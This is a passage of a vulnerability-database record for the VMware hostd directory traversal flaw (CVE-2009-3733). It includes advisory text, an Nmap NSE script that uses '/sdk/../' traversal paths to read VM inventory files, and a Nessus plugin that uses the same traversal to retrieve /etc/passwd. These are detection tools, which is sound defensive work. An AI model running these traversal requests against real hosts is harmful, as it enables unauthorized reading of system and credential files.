\n", "edition": 2, "modified": "2009-11-02T15:30:00", "published": "2009-11-02T15:30:00", "id": "D2SEC_VMWARE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_vmware", "title": "DSquare Exploit Pack: D2SEC_VMWARE", "type": "d2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T18:55:16", "description": "VMware Server 2.0.1,ESXi Server 3.5 Directory Traversal Vulnerability. CVE-2009-3733. Remote exploits for multiple platform", "published": "2009-10-27T00:00:00", "type": "exploitdb", "title": "VMware Server <= 2.0.1,ESXi Server <= 3.5 - Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "modified": "2009-10-27T00:00:00", "id": "EDB-ID:33310", "href": "https://www.exploit-db.com/exploits/33310/", "sourceData": "source: http://www.securityfocus.com/bid/36842/info\r\n\r\nVMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.\r\n\r\nExploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.\r\n\r\ndescription = [[\r\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\r\n]]\r\n\r\n---\r\n-- @usage\r\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\r\n--\r\n-- @output\r\n--| http-vmware-path-vuln: \r\n--| VMWare path traversal (CVE-2009-3733): VULNERABLE\r\n--| /vmware/Windows 2003/Windows 2003.vmx\r\n--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\r\n--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\r\n--| 
/mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\r\n--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\r\n-----------------------------------------------------------------------\r\n\r\nauthor = \"Ron Bowes\"\r\nlicense = \"Same as Nmap--See http://www.exampel.com/book/man-legal.html\"\r\ncategories = {\"vuln\", \"safe\", \"default\"}\r\n\r\nrequire \"http\"\r\nrequire \"shortport\"\r\n\r\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {\"http\", \"https\"})\r\n\r\nlocal function get_file(host, port, path)\r\n\tlocal file\r\n\r\n\t-- Replace spaces in the path with %20\r\n\tpath = string.gsub(path, \" \", \"%%20\")\r\n\r\n\t-- Try both ../ and %2E%2E/\r\n\tfile = \"/sdk/../../../../../../\" .. path\r\n\r\n\tlocal result = http.get( host, port, file)\r\n\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\tfile = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\" .. path\r\n\t\tresult = http.get( host, port, file)\r\n\r\n\t\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\t\treturn false, \"Couldn't download file: \" .. path\r\n\t\tend\r\n\tend\r\n\r\n\treturn true, result.body, file\r\nend\r\n\r\nlocal function fake_xml_parse(str, tag)\r\n\tlocal result = {}\r\n\tlocal index, tag_start, tag_end\r\n\r\n\t-- Lowercase the 'body' we're searching\r\n\tlocal lc = string.lower(str)\r\n\t-- Lowercase the tag\r\n\ttag = string.lower(tag)\r\n\r\n\t-- This loop does some ugly pattern-based xml parsing\r\n\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\")\r\n\twhile index do\r\n\t\ttag_end, index = string.find(lc, \"</\" .. tag .. \">\", index)\r\n\t\ttable.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\r\n\t\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\", index)\r\n\tend\r\n\r\n\treturn result\r\nend\r\n\r\n--local function parse_vmware_conf(str, field)\r\n--\tlocal index, value_start = string.find(str, field .. 
\"[^\\\"]*\")\r\n--\tif(not(index) or not(value_start)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\tlocal value_end = string.find(str, \"\\\"\", value_start + 1)\r\n--\tif(not(value_end)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\treturn string.sub(str, value_start + 1, value_end - 1)\r\n--end\r\n\r\nlocal function go(host, port)\r\n\tlocal result, body\r\n\tlocal files\r\n\r\n\t-- Try to download the file\r\n\tresult, body = get_file(host, port, \"/etc/vmware/hostd/vmInventory.xml\");\r\n\t-- It failed -- probably not vulnerable\r\n\tif(not(result)) then\r\n\t\treturn false, \"Couldn't download file: \" .. body\r\n\tend\r\n\r\n\t-- Check if the file contains the proper XML\r\n\tif(string.find(string.lower(body), \"configroot\") == nil) then\r\n\t\treturn false, \"Server didn't return XML -- likely not vulnerable.\"\r\n\tend\r\n\r\n\tfiles = fake_xml_parse(body, \"vmxcfgpath\")\r\n\r\n\tif(#files == 0) then\r\n\t\treturn true, {\"No VMs appear to be installed\"}\r\n\tend\r\n\r\n\t-- Process each of the .vmx files if verbosity is on\r\n--\tif(nmap.verbosity() > 1) then\r\n--\t\tlocal result, file = get_file(host, port, files[1])\r\n--io.write(nsedebug.tostr(file))\r\n--\tend\r\n\r\n\treturn true, files\r\nend\r\n\r\naction = function(host, port)\r\n\t-- Try a standard ../ path\r\n\tlocal status, result = go(host, port)\r\n\r\n\tif(not(status)) then\r\n\t\treturn nil\r\n\tend\r\n\r\n\tlocal response = {}\r\n\ttable.insert(response, \"VMWare path traversal (CVE-2009-3733): VULNERABLE\")\r\n\r\n\tif(nmap.verbosity() > 1) then\r\n\t\ttable.insert(response, result)\r\n\tend\r\n\r\n\treturn stdnse.format_output(true, response)\r\nend\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33310/"}], "nessus": [{"lastseen": "2021-01-20T15:47:42", "description": "The version of VMware Host Agent (hostd) running on the remote host\nhas a directory traversal vulnerability. 
The affected service runs\nas root. VMware ESX, VMware ESXi, and VMware Server on Linux are\naffected.\n\nA remote attacker could exploit this to read arbitrary files,\nincluding guest VMs, from the system.", "edition": 27, "published": "2010-02-17T00:00:00", "title": "VMware Host Agent Directory Traversal (VMSA-2009-0015)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "modified": "2010-02-17T00:00:00", "cpe": ["cpe:/a:a:vmware:esx", "cpe:/a:a:vmware:server", "cpe:/a:a:vmware:esxi"], "id": "VMWARE_DIR_TRAVERSAL_VMSA_2009_0015.NASL", "href": "https://www.tenable.com/plugins/nessus/44646", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(44646);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-3733\");\n script_bugtraq_id(36842);\n script_xref(name:\"VMSA\", value:\"2009-0015\");\n script_xref(name:\"Secunia\", value:\"37186\");\n\n script_name(english:\"VMware Host Agent Directory Traversal (VMSA-2009-0015)\");\n script_summary(english:\"Tries to grab /etc/passwd\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web application on the remote host has a directory traversal\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of VMware Host Agent (hostd) running on the remote host\nhas a directory traversal vulnerability. The affected service runs\nas root. 
VMware ESX, VMware ESXi, and VMware Server on Linux are\naffected.\n\nA remote attacker could exploit this to read arbitrary files,\nincluding guest VMs, from the system.\"\n );\n # https://fyrmassociates.com:443/pdfs/Stealing_Guests_The_VMware_Way-ShmooCon2010.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2787f95\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://fyrmassociates.com/tools/gueststealer-v1.pl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2009/Oct/274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.vmware.com/security/advisories/VMSA-2009-0015.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the relevant upgrade referenced in the VMware advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Vmware Server File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:a:vmware:esx\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:a:vmware:esxi\");\n 
script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:a:vmware:server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_hostd_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/vmware_hostd\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nos = get_kb_item('Host/OS');\nif (os && 'Windows' >< os)\n exit(0, 'This is a Windows host, and only Linux hosts are affected.');\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'vmware_hostd', port:port);\nif (isnull(install))\n exit(1, \"No VMware hostd installs on port \"+port+\" were found in the KB.\");\n\n# dir traversal depends on the product being exploited (ESX/ESXi or Server)\nif ('esx' >< tolower(install['ver']))\n dotdot = '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/';\nelse if ('server' >< tolower(install['ver']))\n dotdot = '../../../../../../../../..';\nelse\n exit(0, 'VMware Server/ESX/ESXi does not appear to be running on the remote host.');\n\nurl = '/sdk/'+dotdot+'/etc/passwd';\nreq = http_mk_get_req(port:port, item:url);\nres = http_send_recv_req(port:port, req:req);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\nif (ereg(string:res[2], pattern:'root:.*:0:[01]:'))\n{\n if (report_verbosity > 0)\n {\n req_str = http_mk_buffer_from_req(req:req);\n report =\n '\\nNessus was able to exploit the issue to retrieve the contents of\\n'+\n \"'/etc/passwd' on the remote 
host using the following URL :\" + '\\n\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n req_str+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n\n if (report_verbosity > 1)\n {\n res[2] = data_protection::redact_etc_passwd(output:res[2]);\n report +=\n '\\nHere are its contents :\\n\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir'], port:port);\n exit(0, 'The VMware hostd install at '+full_url+' is not affected.');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T15:20:00", "description": "a. Mishandled exception on page faults\n\n An improper setting of the exception code on page faults may allow\n for local privilege escalation on the guest operating system. This\n vulnerability does not affect the host system.\n\n VMware would like to thank Tavis Ormandy and Julien Tinnes of the\n Google Security Team for reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-2267 to this issue.\n\nb. Directory Traversal vulnerability\n\n A directory traversal vulnerability allows for remote retrieval of\n any file from the host system. 
In order to send a malicious request,\n the attacker will need to have access to the network on which the\n host resides.\n\n VMware would like to thank Justin Morehouse and Jason Kratzer for\n independently reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-3733 to this issue.", "edition": 27, "published": "2009-10-28T00:00:00", "title": "VMSA-2009-0015 : VMware hosted products and ESX patches resolve two security issues", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "modified": "2009-10-28T00:00:00", "cpe": ["cpe:/o:vmware:esx:3.5", "cpe:/o:vmware:esxi:3.5", "cpe:/o:vmware:esx:2.5.5"], "id": "VMWARE_VMSA-2009-0015.NASL", "href": "https://www.tenable.com/plugins/nessus/42289", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2009-0015. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42289);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-2267\", \"CVE-2009-3733\");\n script_xref(name:\"VMSA\", value:\"2009-0015\");\n\n script_name(english:\"VMSA-2009-0015 : VMware hosted products and ESX patches resolve two security issues\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. Mishandled exception on page faults\n\n An improper setting of the exception code on page faults may allow\n for local privilege escalation on the guest operating system. 
This\n vulnerability does not affect the host system.\n\n VMware would like to thank Tavis Ormandy and Julien Tinnes of the\n Google Security Team for reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-2267 to this issue.\n\nb. Directory Traversal vulnerability\n\n A directory traversal vulnerability allows for remote retrieval of\n any file from the host system. In order to send a malicious request,\n the attacker will need to have access to the network on which the\n host resides.\n\n VMware would like to thank Justin Morehouse and Jason Kratzer for\n independently reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-3733 to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Vmware Server File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:3.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2009-10-27\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 2.5.5\", patch:\"15\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200901401-SG\",\n patch_updates : make_list(\"ESX350-200911201-UG\", \"ESX350-201006401-SG\", \"ESX350-201012401-SG\", \"ESX350-Update04\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910401-SG\",\n patch_updates : make_list(\"ESX350-200911201-UG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 3.5.0\", patch:\"ESXe350-200901401-I-SG\")) flag++;\nif (esx_check(ver:\"ESXi 3.5.0\", 
patch:\"ESXe350-200910401-I-SG\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:esx_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:54:29", "description": "The remote host is affected by the vulnerability described in GLSA-201209-25\n(VMware Player, Server, Workstation: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VMware Player, Server,\n and Workstation. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n Local users may be able to gain escalated privileges, cause a Denial of\n Service, or gain sensitive information.\n A remote attacker could entice a user to open a specially crafted file,\n possibly resulting in the remote execution of arbitrary code, or a Denial\n of Service. Remote attackers also may be able to spoof DNS traffic, read\n arbitrary files, or inject arbitrary web script to the VMware Server\n Console.\n Furthermore, guest OS users may be able to execute arbitrary code on the\n host OS, gain escalated privileges on the guest OS, or cause a Denial of\n Service (crash the host OS).\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "cvss3": {"score": 6.8, "vector": "AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"}, "published": "2012-10-01T00:00:00", "title": "GLSA-201209-25 : VMware Player, Server, Workstation: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", 
"CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "modified": "2012-10-01T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:vmware-server", "p-cpe:/a:gentoo:linux:vmware-workstation", "p-cpe:/a:gentoo:linux:vmware-player"], "id": "GENTOO_GLSA-201209-25.NASL", "href": "https://www.tenable.com/plugins/nessus/62383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201209-25.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62383);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-5269\", \"CVE-2007-5503\", \"CVE-2007-5671\", \"CVE-2008-0967\", \"CVE-2008-1340\", \"CVE-2008-1361\", \"CVE-2008-1362\", \"CVE-2008-1363\", \"CVE-2008-1364\", \"CVE-2008-1392\", \"CVE-2008-1447\", \"CVE-2008-1806\", \"CVE-2008-1807\", \"CVE-2008-1808\", \"CVE-2008-2098\", \"CVE-2008-2100\", \"CVE-2008-2101\", \"CVE-2008-4915\", \"CVE-2008-4916\", \"CVE-2008-4917\", \"CVE-2009-0040\", \"CVE-2009-0909\", \"CVE-2009-0910\", \"CVE-2009-1244\", \"CVE-2009-2267\", \"CVE-2009-3707\", \"CVE-2009-3732\", \"CVE-2009-3733\", \"CVE-2009-4811\", \"CVE-2010-1137\", \"CVE-2010-1138\", \"CVE-2010-1139\", \"CVE-2010-1140\", \"CVE-2010-1141\", \"CVE-2010-1142\", \"CVE-2010-1143\", \"CVE-2011-3868\");\n script_bugtraq_id(25956, 26650, 28276, 28289, 29444, 29552, 29557, 29637, 29639, 29640, 29641, 30131, 30937, 
32168, 32597, 33827, 33990, 34373, 34471, 36630, 36841, 36842, 39104, 39392, 39394, 39395, 39396, 39397, 39407, 39949, 49942);\n script_xref(name:\"GLSA\", value:\"201209-25\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"GLSA-201209-25 : VMware Player, Server, Workstation: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201209-25\n(VMware Player, Server, Workstation: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VMware Player, Server,\n and Workstation. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n Local users may be able to gain escalated privileges, cause a Denial of\n Service, or gain sensitive information.\n A remote attacker could entice a user to open a specially crafted file,\n possibly resulting in the remote execution of arbitrary code, or a Denial\n of Service. Remote attackers also may be able to spoof DNS traffic, read\n arbitrary files, or inject arbitrary web script to the VMware Server\n Console.\n Furthermore, guest OS users may be able to execute arbitrary code on the\n host OS, gain escalated privileges on the guest OS, or cause a Denial of\n Service (crash the host OS).\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201209-25\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Gentoo discontinued support for VMware Player. 
We recommend that users\n unmerge VMware Player:\n # emerge --unmerge 'app-emulation/vmware-player'\n NOTE: Users could upgrade to\n “>=app-emulation/vmware-player-3.1.5”, however these packages are\n not currently stable.\n Gentoo discontinued support for VMware Workstation. We recommend that\n users unmerge VMware Workstation:\n # emerge --unmerge 'app-emulation/vmware-workstation'\n NOTE: Users could upgrade to\n “>=app-emulation/vmware-workstation-7.1.5”, however these packages\n are not currently stable.\n Gentoo discontinued support for VMware Server. We recommend that users\n unmerge VMware Server:\n # emerge --unmerge 'app-emulation/vmware-server'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-757\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Vmware Server File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(16, 20, 22, 94, 119, 134, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-player\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/vmware-server\", unaffected:make_list(), vulnerable:make_list(\"le 1.0.9.156507\"))) flag++;\nif (qpkg_check(package:\"app-emulation/vmware-workstation\", unaffected:make_list(), vulnerable:make_list(\"le 6.5.5.328052\"))) flag++;\nif (qpkg_check(package:\"app-emulation/vmware-player\", unaffected:make_list(), vulnerable:make_list(\"le 2.5.5.328052\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VMware Player / Server / Workstation\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:53", "description": "\nVMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal", "edition": 1, "published": "2009-10-27T00:00:00", "title": "VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "modified": "2009-10-27T00:00:00", "id": "EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/36842/info\n\nVMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.\n\nExploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.\n\ndescription = [[\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin 